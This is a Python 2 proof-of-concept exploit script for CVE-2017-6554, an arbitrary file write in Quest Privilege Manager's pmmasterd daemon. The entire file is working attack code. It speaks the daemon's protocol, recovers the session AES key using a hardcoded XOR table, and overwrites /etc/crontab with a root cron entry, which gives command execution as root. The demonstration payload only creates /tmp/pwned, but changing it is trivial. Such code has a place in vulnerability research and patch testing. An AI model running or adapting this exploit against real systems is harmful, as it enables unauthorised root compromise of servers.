#!/usr/bin/env python2 """ # Exploit Title: Quest Privilege Manager pmmasterd Arbitrary File Write # Date: 10/Mar/2017 # Exploit Author: m0t # Vendor Homepage: https://www.quest.com/products/privilege-manager-for-unix/ # Version: 6.0.0-27, 6.0.0-50 # Tested on: ubuntu 14.04 x86_64, ubuntu 16.04 x86, ubuntu 12.04 x86 # CVE : 2017-6554 REQUIREMENTS - Root privs are required to bind a privileged source port - python hexdump: pip install hexdump This PoC gains arbitrary command execution by overwriting /etc/crontab In case of successful exploitation /etc/crontab will contain the following line * * * * * root touch /tmp/pwned """ import binascii as b import hexdump as h import struct import sys import socket from Crypto.Cipher import AES cipher=None def create_enc_packet(action, len1=None, len2=None, body=None): global cipher if body == None: body_raw = b.unhexlify("50696e6745342e362e302e302e32372e") else: body_raw = b.unhexlify(body) #pad if len(body_raw) % 16 != 0: body_raw += "\x00" * (16 - (len(body_raw) % 16)) enc_body = cipher.encrypt(body_raw) if len1 == None: len1 = len(body_raw) if len2 == None: len2 = len(enc_body) head = struct.pack('>I', action) + struct.pack('>I', len1) + struct.pack('>I', len2) + '\x00'*68 return head+enc_body def decrypt_packet(packet): global cipher return cipher.decrypt(packet[80:]) def create_packet(action, len1=None, len2=None, body=None): if body == None: body = "50696e6745342e362e302e302e32372e" if len1 == None: len1 = len(body)/2 if len2 == None: len2 = len1 head = struct.pack('>I', action) + struct.pack('>I', len1) + struct.pack('>I', len2) + '\x00'*68 return head+b.unhexlify(body) #extract action code from first 4b, return action found def get_action(packet): code = struct.unpack('>I',packet[:4])[0] return code def generate_aes_key(buf): some_AES_bytes = [ 0xDF, 0x4E, 0x34, 0x05, 0xF4, 0x4D, 0x19, 0x22, 0x98, 0x4F, 0x58, 0x62, 0x2C, 0x2A, 0x54, 0x42, 0xAA, 0x76, 0x53, 0xD4, 0xF9, 0xDC, 0x98, 0x90, 0x23, 0x49, 0x71, 0x12, 0xEA, 0x33, 0x12, 0x63 ]; retbuf = "" if len(buf) < 0x20: print("[-] initial key buffer too small, that's bad") return None for i in range(0x20): retbuf+= chr(ord(buf[i])^some_AES_bytes[i]) return retbuf def main(): global cipher if len(sys.argv) < 2: print("usage: %s []" % sys.argv[0]) sys.exit(-1) s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) if len(sys.argv) > 2: sport = int(sys.argv[2]) else: sport = 666 s.bind(("", sport)) s.connect((sys.argv[1], 12345)) try: s.send(create_packet(0xfa, body=b.hexlify("/etc/crontab"))) #s.send(create_packet(0x134)) print("[+] sent ACT_NEWFILESENT") resp=s.recv(1024) h.hexdump(resp) action=get_action(resp) if action == 212: print("[+] server returned 212, this is a good sign, press Enter to continue") else: print("[-] server returned %d, exploit will probably fail, press CTRL-C to exit or Enter to continue" % action) sys.stdin.readline() print("[+] exchanging DH pars") dh="\x00"*63+"\x02" s.send(dh) dh=s.recv(1024) h.hexdump(dh) aes_key = generate_aes_key(dh) print("[+] got AES key below:") h.hexdump(aes_key) cipher=AES.new(aes_key) print("[+] press Enter to continue") sys.stdin.readline() print("[+] sending:") enc=create_enc_packet(0xfb, body=b.hexlify("* * * * * root touch /tmp/pwned\n")) h.hexdump(enc) s.send(enc ) enc=create_enc_packet(0xfc, body="") h.hexdump(enc) s.send(enc ) print("[+] got:") resp=s.recv(1024) h.hexdump(resp) print("[+] trying decrypt") h.hexdump(decrypt_packet(resp)) s.close() except KeyboardInterrupt: s.close() exit(-1) main()